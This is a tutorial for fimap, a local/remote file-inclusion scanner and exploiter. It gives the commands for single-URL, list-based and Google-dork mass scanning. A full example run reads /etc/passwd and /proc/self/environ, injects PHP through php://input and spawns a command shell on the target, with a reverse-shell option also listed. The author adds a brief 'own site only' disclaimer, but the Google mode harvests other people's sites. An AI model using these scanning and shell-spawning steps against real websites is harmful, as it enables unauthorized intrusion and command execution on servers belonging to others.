fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn’t know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.

Table of Contents
0. Introduction
[a] What is fimap?
[b] Let’s go.
1. Single URL Scan
[a] Why?
[b] Ok – show me how.
2. Mass Scan
3. Google Scan
4. Obtaining a shell
5. Full Example Run
6. Last Words
7. Greetings

[0] INTRODUCTION
[a] What is fimap?
fimap is a Local- and Remote-File-Injection scanner and exploiter written by me.
It’s released under GPLv2 and you can download it at fimap.googlecode.com fimap – Project Hosting on Google Code

[b] LET’S GO
Befor we start make sure that you don’t use fimap for illegal stuff.
Use it only on your own site to test if your inclusions are secure or not.
You use it at your own risk and I don’t take any responsibility for it.
Ok – Let’s go then!

[1] SINGLE URL SCAN
[a] Why?
Sometimes I am playing on my websites GET variables in the browser to check for inclusion bugs.
When I actually find something fimap is my friend. I can simply give him the URL I found and fimap
will do the rest for me.

[b] Ok – show me how.
It’s very easy to start a single url scan.
Simply start fimap using the -u or –url parameter:

imax@DevelB0x:~$ ./fimap.py -u “http://localhost/vulnerable.php?inc=index.php”

If fimap has found an Inclusion-Bug, you will see a box like this:

################################################## #################################
#[1] Possible File Injection #
################################################## #################################
# [URL] http://localhost/vulnerable.php?inc=index #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It’s clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
################################################## #################################

You can see that we actually have readable files. Some of them are usable to inject code – some not.
fimap will automaticly log every valuable result to ‘~/fimap_results.xml’. The XML will never be deleted.
All new results will be injected correctly into the XML. Feel free to delete it if you want.
Possible injections which can’t be successfully exploited by fimap will be logged into a dirty
csv file: ‘~/fimap.log’

Well, that’s it for single url scanning!
If you want to spawn a shell using your newly found bug(s) watch [4]

[2] MASS SCAN
Mass scanning is very similar to single url scanning. The only difference is (you guess it):
you can scan a whole txt (each line = one url) for inclusion bugs.
Just like in single url mode everything will be logged to the log files.
To use mass mode use:

imax@DevelB0x:~$ ./fimap.py -m -l “/tmp/myurllist.txt”

[3] GOOGLE SCAN
Same as mass scan. But instead of getting the urls from a txt-list it will use google to get urls.
To use google mode use:

imax@DevelB0x:~$ ./fimap.py -g -q ‘inurl:”include.php”‘
or
imax@DevelB0x:~$ ./fimap.py -g -q ‘inurl:”req.php” -svn -trak -cvs’

[4] OBTAINING A SHELL
If you have found some inclusion bugs you can directly make use of them!
Simply call:

imax@DevelB0x:~$ ./fimap.py -x

fimap will ask you some questions and then you should have a shell!

[5] FULL EXAMPLE RUN

[CMD]imax@DevelB0x:~$ ./fimap.py -u “http://localhost/vulnerable.php?inc=index.php”
fimap v.01 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: ‘http://localhost/vulnerable.php?inc=index.php’
[OUT] Parsing URL ‘http://localhost/vulnerable.php?inc=index.php’…
[INFO] Fiddling around with URL…
[OUT] Possible file inclusion found! -> ‘http://localhost/vulnerable.php?inc=bUTeWg6j’ with Parameter ‘inc’.
[OUT] Identifing Vulnerability ‘http://localhost/vulnerable.php?inc=index.php’ with Key ‘inc’…
[INFO] Scriptpath received: ‘/var/www’
[INFO] Testing file ‘/etc/passwd’…
[INFO] Testing file ‘/proc/self/environ’…
[INFO] Testing file ‘php://input’…
[INFO] Testing file ‘http://www.phpbb.de/index.php’…
[INFO] Testing file ‘http://www.uni-bonn.de/Frauengeschichte/index.html’…
[INFO] Testing file ‘http://www.kah-bonn.de/index.htm?presse/winterthur.htm’…
################################################## #################################
#[1] Possible File Injection #
################################################## #################################
# [URL] http://localhost/vulnerable.php?inc=index.php #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It’s clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
################################################## #################################
[CMD]imax@DevelB0x:~$ ./fimap.py -x
fimap v.01 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
################################################## #############################################
#FI Bugs on localhost #
################################################## #############################################
#[1] URL: ‘/vulnerable.php?inc=index.php’ injecting file: ‘php://input’ using param: ‘inc’ #
################################################## #############################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST…
[OUT] PHP Injection works! Testing if execution works…
[OUT] Testing execution thru ‘popen’…
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell… #
#################################
Choose Attack: 1
——————————————-
Welcome to fimap shell!
Better don’t start interactive commands!
Enter ‘q’ to exit the shell.
——————————————-
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q

See ya dude!

[6] LAST WORDS
You can configure most of the attack vectors in the config.py file inside your fimap directory.
The file is documentated. So check the file for more infos. All I can say here is that if you
want the full advantage of RFI attacks you should configure your settings[“dynamic_rfi”] dict.
Please remember that fimap is currently under a week old and under heavy development.
Goto http://fimap.googlecode.com and stay tuned about updates.
To check out the lastest code use:
svn checkout http://fimap.googlecode.com/svn/trunk/ fimap

I don’t know and currently don’t care if it works on windows. Works fine on Unixes.
If you find a bug feel free to report it.
I hope you like it.

[7] GREETINGS
Greetings to: rita, exorzist, invisible, ruun, beatkeeper, dextrous

credits to : KingPin

Explore More

Windows XP Users: Careful With That F1 Button!

Microsoft is investigating new public reports of a vulnerability in VBScript that is exposed on supported versions of Microsoft Windows 2000, Windows XP, and Windows Server 2003 through the use

What Is a Hacker?

Hacker is one of those terms that has a different meaning depending on who uses it. Among programmers, to be a hacker is to be a star. Hackers are programming

What are the user authentications supported by the SSH-2 protocol?

The SSH-2 protocol supports the following user authentications: * Public key authentication (DSA, RSA*, OpenPGP) * Host-based authentication * Password-based authentication Note: SSH-1 supports a wider range of user authentications,